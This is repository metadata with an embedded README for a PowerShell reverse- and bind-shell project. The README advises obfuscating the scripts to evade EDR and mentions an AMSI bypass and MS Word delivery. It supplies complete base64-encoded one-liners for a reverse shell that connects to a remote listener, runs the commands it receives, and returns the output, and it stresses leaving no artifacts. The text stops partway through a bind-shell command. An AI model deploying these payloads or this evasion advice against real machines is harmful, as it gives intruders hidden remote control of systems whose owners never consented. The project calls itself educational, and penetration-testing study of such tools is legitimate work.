{"id":13641965,"url":"https://github.com/ivan-sincek/powershell-reverse-tcp","last_synced_at":"2025-04-07T13:07:19.266Z","repository":{"id":107019401,"uuid":"195106565","full_name":"ivan-sincek/powershell-reverse-tcp","owner":"ivan-sincek","description":"PowerShell scripts for communicating with a remote host.","archived":false,"fork":false,"pushed_at":"2023-04-27T20:35:11.000Z","size":31,"stargazers_count":301,"open_issues_count":0,"forks_count":67,"subscribers_count":7,"default_branch":"master","last_synced_at":"2025-03-31T11:06:04.920Z","etag":null,"topics":["bind-shell","bind-tcp","bug-bounty","defensive-security","ethical-hacking","networking","offensive-security","penetration-testing","powershell","red-team-engagement","reverse-shell","reverse-tcp","security","tcp"],"latest_commit_sha":null,"homepage":"","language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-07-03T18:19:54.000Z","updated_at":"2025-02-28T01:20:08.000Z","dependencies_parsed_at":null,"dependency_job_id":"cc608b0c-db9b-40e4-8af2-363f8fbf2748","html_url":"https://github.com/ivan-sincek/powershell-reverse-tcp","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fpowershell-reverse-tcp/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/powershell-reverse-tcp/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247657281,"owners_count":20974345,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bind-shell","bind-tcp","bug-bounty","defensive-security","ethical-hacking","networking","offensive-security","penetration-testing","powershell","red-team-engagement","reverse-shell","reverse-tcp","security","tcp"],"created_at":"2024-08-02T01:01:26.084Z","updated_at":"2025-04-07T13:07:19.243Z","avatar_url":"https://github.com/ivan-sincek.png","language":"PowerShell","readme":"# PowerShell Reverse TCP\n\nPowerShell scripts for communicating with a remote host.\n\nRemote host will have a full control over the client and all the underlying system commands.\n\nCheck shells based on:\n\n* Invoke-Expression PowerShell command [here](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/invoke_expression),\n* process pipes [here](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/process_pipes).\n\nTested with PowerShell v5.1.19041.2673 on Windows 10 Enterprise OS (64-bit).\n\nMade for educational purposes. I hope it will help!\n\n**This repository started to have known signatures and I don't have time to upload new scripts each time so you should obfuscate these scripts yourself.**\n\nFuture plans:\n\n* more shells based on process pipes, and optimize them further.\n\n## Table of Contents\n\n* [How to Run](#how-to-run)\n* [Obfuscate PowerShell Scripts](#obfuscate-powerShell-scripts)\n\t* [PowerShell Encoded Command](#powershell-encoded-command)\n\t* [SecureString](#securestring)\n* [AMSI Bypass](#amsi-bypass)\n* [MS Word Integration](#ms-word-integration)\n* [Set Up a Listener](#set-up-a-listener)\n* [Runtime](#runtime)\n\n## How to Run\n\n**Change the IP address and port number inside the scripts as necessary.**\n\nOpen the PowerShell from [\\\\src\\\\invoke_expression\\\\original\\\\](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/invoke_expression/original) or [\\\\src\\\\process_pipes\\\\original\\\\](https://github.com/ivan-sincek/powershell-reverse-tcp/tree/master/src/process_pipes/original) and run the commands shown below.\n\nSet the execution policy:\n\n```pwsh\nSet-ExecutionPolicy Unrestricted\n```\n\nRun the script:\n\n```pwsh\n.\\powershell_reverse_tcp.ps1\n```\n\nOr, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -ExecutionPolicy Unrestricted -File .\\powershell_reverse_tcp.ps1\n```\n\n## Obfuscate PowerShell Scripts\n\nTry to bypass EDR and other security mechanisms by obfuscating your scripts. You can see such obfuscations in the examples below.\n\nOriginal PowerShell command:\n\n```pwsh\n(New-Object Net.WebClient).DownloadFile($url, $out)\n```\n\nObfuscated PowerShell command:\n\n```pwsh\n\u0026 (`G`C`M *ke-E*) '(\u0026 (`G`C`M *ew-O*) `N`E`T`.`W`E`B`C`L`I`E`N`T).\"`D`O`W`N`L`O`A`D`F`I`L`E\"($url, $out)'\n```\n\n**Check the original PowerShell script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) and the fully obfuscated one [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1).**\n\nAfter [manual obfuscation](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1), the original PowerShell script was obfuscated with [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation). Credits to the author!\n\nSearch the Internet for additional obfuscation techniques and methods.\n\nP.S. Because PowerShell is constantly being updated, some regular expressions (e.g. `*ke-E*`) may start to throw exceptions due to multiple methods matching the same expression, so the expressions will need to be specified a little bit better.\n\n### PowerShell Encoded Command\n\nTo generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:\n\n```pwsh\n[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))\n```\n\nTo decode a PowerShell encoded command, run the following PowerShell command:\n\n```pwsh\n[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))\n```\n\nUse the one-liners below if you don't want to leave any artifacts behind.\n\n---\n\n**\\[Reverse TCP - Invoke-Expression\\]** To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -Command \"'127.0.0.1', '9000'\" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABhACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgACQAcAAgAD0AIAAkACgAUgBlAGEAZAAtAEgAbwBzAHQAIAAtAFAAcgBvAG0AcAB0ACAAIgBFAG4AdABlAHIAIABwAG8AcgB0ACAAbgB1AG0AYgBlAHIAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgAGkAZgAgACgAJABhAC4ATABlAG4AZwB0AGgAIAAtAGwAdAAgADEAIAAtAG8AcgAgACQAcAAuAEwAZQBuAGcAdABoACAALQBsAHQAIAAxACkAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBvAHQAaAAgAHAAYQByAGEAbQBlAHQAZQByAHMAIABhAHIAZQAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBQAG8AdwBlAHIAUwBoAGUAbABsACAAUgBlAHYAZQByAHMAZQAgAFQAQwBQACAAdgA0AC4AMAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAuAGAAbgBHAGkAdABIAHUAYgAgAHIAZQBwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACIAOwAgACQAYwAgAD0AIAAkAHMAIAA9ACAAJABiACAAPQAgACQAdwAgAD0AIAAkAGQAIAA9ACAAJAByACAAPQAgACQAbgB1AGwAbAA7ACAAdAByAHkAIAB7ACAAJABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAoACQAYQAsACAAJABwACkAOwAgACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwA7ACAAJAB3ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALAAgADEAMAAyADQAKQA7ACAAJAB3AC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuACIAOwAgACQAYgB5ACAAPQAgADAAOwAgAGQAbwAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7ACAAZABvACAAewAgACQAYgB5ACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAGQAIAArAD0AIAAkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgAsACAAMAAsACAAJABiAHkAKQA7ACAAfQAgAH0AIAB3AGgAaQBsAGUAIAAoACQAcwAuAEQAYQB0AGEAQQB2AGEAaQBsAGEAYgBsAGUAKQA7ACAAaQBmACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApACAAewAgACQAZAAgAD0AIAAkAGQALgBUAHIAaQBtACgAKQA7ACAAaQBmACAAKAAkAGQALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAApACAAewAgAHQAcgB5ACAAewAgACQAcgAgAD0AIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAkAGQAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwAgAH0AIABjAGEAdABjAGgAIAB7ACAAJAByACAAPQAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwAgAH0AIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABkADsAIABpAGYAIAAoACQAcgAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAJAB3AC4AVwByAGkAdABlACgAJAByACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAHIAOwAgAH0AIAB9ACAAfQAgAH0AIAB3AGgAaQBsAGUAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4AIgA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsAIAB9ACAAZgBpAG4AYQBsAGwAeQAgAHsAIABpAGYAIAAoACQAdwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB3AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB3AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAHcAOwAgAH0AIABpAGYAIAAoACQAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABzAC4AQwBsAG8AcwBlACgAKQA7ACAAJABzAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAHMAOwAgAH0AIABpAGYAIAAoACQAYwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABjAC4AQwBsAG8AcwBlACgAKQA7ACAAJABjAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAGMAOwAgAH0AIABpAGYAIAAoACQAYgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABiAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAAYgA7ACAAfQAgAGkAZgAgACgAJAByACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAByADsAIAB9ACAAaQBmACAAKAAkAGQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAGQAOwAgAH0AIABbAEcAQwBdADoAOgBDAG8AbABsAGUAYwB0ACgAKQA7ACAAfQAgAH0AIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABhADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABwADsA\n```\n\nThe encoded script will prompt for input. See the slightly altered script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1) - used the [minified](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1) script to reduce the command length.\n\n**\\[Reverse TCP - Process Pipes\\]** To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -Command \"'127.0.0.1', '9000'\" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABhACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAGEAZABkAHIAZQBzAHMAIgApAC4AVAByAGkAbQAoACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAgACQAcAB0ACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7ACAAaQBmACAAKAAkAGEALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQAgAC0AbwByACAAJABwAHQALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQApACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAbwB0AGgAIABwAGEAcgBhAG0AZQB0AGUAcgBzACAAYQByAGUAIAByAGUAcQB1AGkAcgBlAGQAIgA7ACAAfQAgAGUAbABzAGUAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAUABvAHcAZQByAFMAaABlAGwAbAAgAFIAZQB2AGUAcgBzAGUAIABUAEMAUAAgAHYANAAuADAAIABiAHkAIABJAHYAYQBuACAAUwBpAG4AYwBlAGsALgBgAG4ARwBpAHQASAB1AGIAIAByAGUAcABvAHMAaQB0AG8AcgB5ACAAYQB0ACAAZwBpAHQAaAB1AGIALgBjAG8AbQAvAGkAdgBhAG4ALQBzAGkAbgBjAGUAawAvAHAAbwB3AGUAcgBzAGgAZQBsAGwALQByAGUAdgBlAHIAcwBlAC0AdABjAHAALgAiADsAIAAkAGMAIAA9ACAAJABzACAAPQAgACQAYgAgAD0AIAAkAHcAIAA9ACAAJABwACAAPQAgACQAZQAgAD0AIAAkAG8AIAA9ACAAJABlAGUAIAA9ACAAJABvAGUAIAA9ACAAJABuAHUAbABsADsAIAB0AHIAeQAgAHsAIAAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAYwBwAEMAbABpAGUAbgB0ACgAJABhACwAIAAkAHAAdAApADsAIAAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAIAAkAHMALgBSAGUAYQBkAFQAaQBtAGUAbwB1AHQAIAA9ACAANQA7ACAAJABiACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABCAHkAdABlAFsAXQAgADEAMAAyADQAOwAgACQAdwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAHMALAAgAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACwAIAAxADAAMgA0ACkAOwAgACQAdwAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7ACAAJABwACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzADsAIAAkAHAALgBTAHQAYQByAHQASQBuAGYAbwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBGAGkAbABlAE4AYQBtAGUAIAA9ACAAIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAgACQAcAAuAFMAdABhAHIAdABJAG4AZgBvAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3ACAAPQAgACQAdAByAHUAZQA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIAA9ACAAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQBdADoAOgBIAGkAZABkAGUAbgA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQAgAD0AIAAkAGYAYQBsAHMAZQA7ACAAJABwAC4AUwB0AGEAcgB0AEkAbgBmAG8ALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAEkAbgBwAHUAdAAgAD0AIAAkAHAALgBTAHQAYQByAHQASQBuAGYAbwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQARQByAHIAbwByACAAPQAgACQAcAAuAFMAdABhAHIAdABJAG4AZgBvAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAAgAD0AIAAkAHQAcgB1AGUAOwAgACQAcAAuAFMAdABhAHIAdABJAG4AZgBvAC4ARQByAHIAbwByAEQAaQBhAGwAbwBnACAAPQAgACQAZgBhAGwAcwBlADsAIAAkAHAALgBFAG4AYQBiAGwAZQBSAGEAaQBzAGkAbgBnAEUAdgBlAG4AdABzACAAPQAgACQAZgBhAGwAcwBlADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByADsAIAAkAG8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByADsAIAAkAHMAYgAgAD0AIAB7ACAAaQBmACAAKAAkAEUAdgBlAG4AdABBAHIAZwBzAC4ARABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAJABFAHYAZQBuAHQALgBNAGUAcwBzAGEAZwBlAEQAYQB0AGEALgBBAHAAcABlAG4AZABMAGkAbgBlACgAJABFAHYAZQBuAHQAQQByAGcAcwAuAEQAYQB0AGEAKQA7ACAAfQAgAH0AOwAgACQAZQBlACAAPQAgAFIAZQBnAGkAcwB0AGUAcgAtAE8AYgBqAGUAYwB0AEUAdgBlAG4AdAAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABwACAALQBFAHYAZQBuAHQATgBhAG0AZQAgACIARQByAHIAbwByAEQAYQB0AGEAUgBlAGMAZQBpAHYAZQBkACIAIAAtAEEAYwB0AGkAbwBuACAAJABzAGIAIAAtAE0AZQBzAHMAYQBnAGUARABhAHQAYQAgACQAZQA7ACAAJABvAGUAIAA9ACAAUgBlAGcAaQBzAHQAZQByAC0ATwBiAGoAZQBjAHQARQB2AGUAbgB0ACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHAAIAAtAEUAdgBlAG4AdABOAGEAbQBlACAAIgBPAHUAdABwAHUAdABEAGEAdABhAFIAZQBjAGUAaQB2AGUAZAAiACAALQBBAGMAdABpAG8AbgAgACQAcwBiACAALQBNAGUAcwBzAGEAZwBlAEQAYQB0AGEAIAAkAG8AOwAgACQAcAAuAFMAdABhAHIAdAAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAIAAkAHAALgBCAGUAZwBpAG4ARQByAHIAbwByAFIAZQBhAGQATABpAG4AZQAoACkAOwAgACQAcAAuAEIAZQBnAGkAbgBPAHUAdABwAHUAdABSAGUAYQBkAEwAaQBuAGUAKAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuACIAOwAgAHcAaABpAGwAZQAgACgAIQAkAHAALgBIAGEAcwBFAHgAaQB0AGUAZAApACAAewAgAHQAcgB5ACAAewAgACQAYgB5ACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAHAALgBTAHQAYQBuAGQAYQByAGQASQBuAHAAdQB0AC4AVwByAGkAdABlACgAJABiACwAIAAwACwAIAAkAGIAeQApADsAIAB9ACAAZQBsAHMAZQAgAHsAIABiAHIAZQBhAGsAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAE0AZQB0AGgAbwBkAEkAbgB2AG8AYwBhAHQAaQBvAG4ARQB4AGMAZQBwAHQAaQBvAG4AXQAgAHsAfQAgAGkAZgAgACgAJABlAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAkAG8ALgBUAG8AUwB0AHIAaQBuAGcAKAApACkAOwAgACQAbwAuAGMAbABlAGEAcgAoACkAOwAgAH0AIABpAGYAIAAoACQAbwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAJAB3AC4AVwByAGkAdABlACgAJABvAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAIAAkAG8ALgBjAGwAZQBhAHIAKAApADsAIAB9ACAAfQAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4AIgA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsAIAB9ACAAZgBpAG4AYQBsAGwAeQAgAHsAIABpAGYAIAAoACQAZQBlACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABVAG4AcgBlAGcAaQBzAHQAZQByAC0ARQB2AGUAbgB0ACAALQBTAG8AdQByAGMAZQBJAGQAZQBuAHQAaQBmAGkAZQByACAAJABlAGUALgBOAGEAbQBlADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABlAGUAOwAgAH0AIABpAGYAIAAoACQAbwBlACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABVAG4AcgBlAGcAaQBzAHQAZQByAC0ARQB2AGUAbgB0ACAALQBTAG8AdQByAGMAZQBJAGQAZQBuAHQAaQBmAGkAZQByACAAJABvAGUALgBOAGEAbQBlADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABvAGUAOwAgAH0AIABpAGYAIAAoACQAcAAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABwAC4AQwBsAG8AcwBlACgAKQA7ACAAJABwAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAHAAOwAgAH0AIABpAGYAIAAoACQAdwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB3AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB3AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAHcAOwAgAH0AIABpAGYAIAAoACQAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABzAC4AQwBsAG8AcwBlACgAKQA7ACAAJABzAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAHMAOwAgAH0AIABpAGYAIAAoACQAYwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABjAC4AQwBsAG8AcwBlACgAKQA7ACAAJABjAC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAGMAOwAgAH0AIABpAGYAIAAoACQAYgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABiAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAAYgA7ACAAfQAgAGkAZgAgACgAJABlACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGUALgBDAGwAZQBhAHIAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABlADsAIAB9ACAAaQBmACAAKAAkAG8AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAbwAuAEMAbABlAGEAcgAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAG8AOwAgAH0AIABbAEcAQwBdADoAOgBDAG8AbABsAGUAYwB0ACgAKQA7ACAAfQAgAH0AIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABhADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABwAHQAOwA=\n```\n\nThe encoded script will prompt for input. See the slightly altered script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/process_pipes/prompt/powershell_reverse_tcp_prompt.ps1) - used the [minified](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/process_pipes/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1) script to reduce the command length.\n\n---\n\n**\\[Bind TCP - Invoke-Expression\\]** To pass parameters to the PowerShell encoded command, run the following command from either PowerShell or Command Prompt:\n\n```pwsh\nPowerShell -Command \"'9000'\" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand 